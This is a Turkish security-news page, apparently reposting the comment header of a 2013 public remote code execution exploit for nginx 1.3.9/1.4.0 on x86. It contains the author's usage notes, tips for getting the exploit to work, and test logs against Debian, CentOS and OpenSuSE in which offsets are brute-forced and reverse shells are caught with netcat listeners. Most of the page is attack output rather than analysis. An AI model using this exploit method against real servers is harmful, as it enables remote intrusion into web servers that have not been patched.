nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit Uzaktan kod çalıştırma back connect açığına ilişkin açıklamalar aşağıdaki gibidir.
#nginx 1.3.9/1.4.0 x86 brute force remote exploit # copyright (c) 2013 kingcope #---------------------------- #fix for internet exploitation, set MTU: #ifconfig <interface> mtu 60000 up # ### # !!! WARNING !!! # this exploit is unlikely to succeed when used against remote internet hosts. # the reason is that nginx uses a non-blocking read() at the remote connection, # this makes exploitation of targets on the internet highly unreliable. # (it has been tested against a testbed on the internet but I couldn't exploit # any other box with it. required was the above ifconfig setting on the client. # maybe enabling large tcp frame support on a gigabit connection is more # useful) # so use it inside intranets only (duh!), this remains a PoC for now 😀 # The exploit does not break stack cookies but makes use of a reliable method # to retrieve all needed offsets for Linux x86 and pop a shell. ### #TODO #*cleanup code #*implement stack cookie break and amd64 support #*support proxy_pass directive ### =for comment TARGET TESTS (Debian, Centos, OpenSuSE) 1. Debian 7 perl ngxunlock.pl Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049c50, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align found 5184 Finding exact library addresses trying plt 0x08049a32, got 0x080bc1a4, function 0xb76f4a80 % FOUND exact ioctl 0x08049a30 % trying plt 0x08049ce2, got 0x080bc250, function 0xb773e890 % FOUND exact memset 0x08049ce0 % trying plt 0x08049d52, got 0x080bc26c, function 0xb76f8d40 % FOUND exact mmap64 0x08049d50 % Found library offsets, determining mnemonics trying 0x0804ed2d % SURVIVED % exact large pop ret 0x0804a7eb exact pop x3 ret 0x0804a7ee bin search done | See reverse handler for success nc -v -l -p 443 listening on [any] 443 ... 192.168.27.146: inverse host lookup failed: Unknown host connect to [192.168.27.146] from (UNKNOWN) [192.168.27.146] 34778 uname -a;id; Linux dakkong 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) cat /etc/debian_version 7.1 2. CentOS 6.4 perl ngxunlock.pl Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5194 align % SEGV % Finding write offset, determining exact align testing 0x08049990, 5200 align % SURVIVED % Extracting memory / bin search done, read 20480 bytes exact align found 5200 Finding exact library addresses trying plt 0x080499f2, got 0x080b31ac, function 0x0094a6b0 % FOUND exact memset 0x080499f0 % trying plt 0x08049b52, got 0x080b3204, function 0x008f1fd0 % FOUND exact ioctl 0x08049b50 % trying plt 0x08049f12, got 0x080b32f4, function 0x008f72c0 % FOUND exact mmap64 0x08049f10 % Found library offsets, determining mnemonics trying 0x0804e9d4 % SURVIVED % exact large pop ret 0x0806194d exact pop x3 ret 0x0804a832 bin search done / See reverse handler for success nc -v -l 443 Connection from port 443 [tcp/https] accepted uname -a;id; Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Thu Feb 21 21:50:49 UTC 2013 i686 i686 i386 GNU/Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 cat /etc/redhat* CentOS release 6.4 (Final) 3. OpenSuSE 12.1 perl ngxunlock.pl Testing if remote httpd is vulnerable % SEGV % YES % Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Verifying align Finding align distance (estimate) testing 5250 align % SEGV % testing 5182 align % SEGV % Finding write offset, determining exact align testing 0x08049a18, 5184 align % SURVIVED % Extracting memory \ bin search done, read 20480 bytes exact align found 5184 Finding exact library addresses trying plt 0x08049a6a, got 0x080be08c, function 0xb75f74f0 % FOUND exact memset 0x08049a68 % trying plt 0x08049b8a, got 0x080be0d4, function 0xb764b160 % FOUND exact ioctl 0x08049b88 % trying plt 0x08049eea, got 0x080be1ac, function 0xb76501e0 % FOUND exact mmap64 0x08049ee8 % Found library offsets, determining mnemonics trying 0x0804ea7f % SURVIVED % exact large pop ret 0x0804a7fa exact pop x3 ret 0x0804a101 bin search done - See reverse handler for success Connection from port 443 [tcp/https] accepted uname -a;id; Linux linux-01xg 3.1.0-1.2-desktop #1 SMP PREEMPT Thu Nov 3 14:45:45 UTC 2011 (187dde0) i686 i686 i386 GNU/Linux uid=65534(nobody) gid=65533(nobody) groups=65533(nobody),65534(nogroup) cat /etc/SuSE-* openSUSE VERSION = 12.1 openSUSE 12.1 (i586) VERSION = 12.1 CODENAME = Asparagus =cut
Bir önceki yazımız olan Symantec Workspace Virtualization 6.4.1895.0 Local Kernel Mode Privilege Escalation Exploit başlıklı makalemizde Symantec Workspace Virtualization Local Exploit hakkında bilgiler verilmektedir.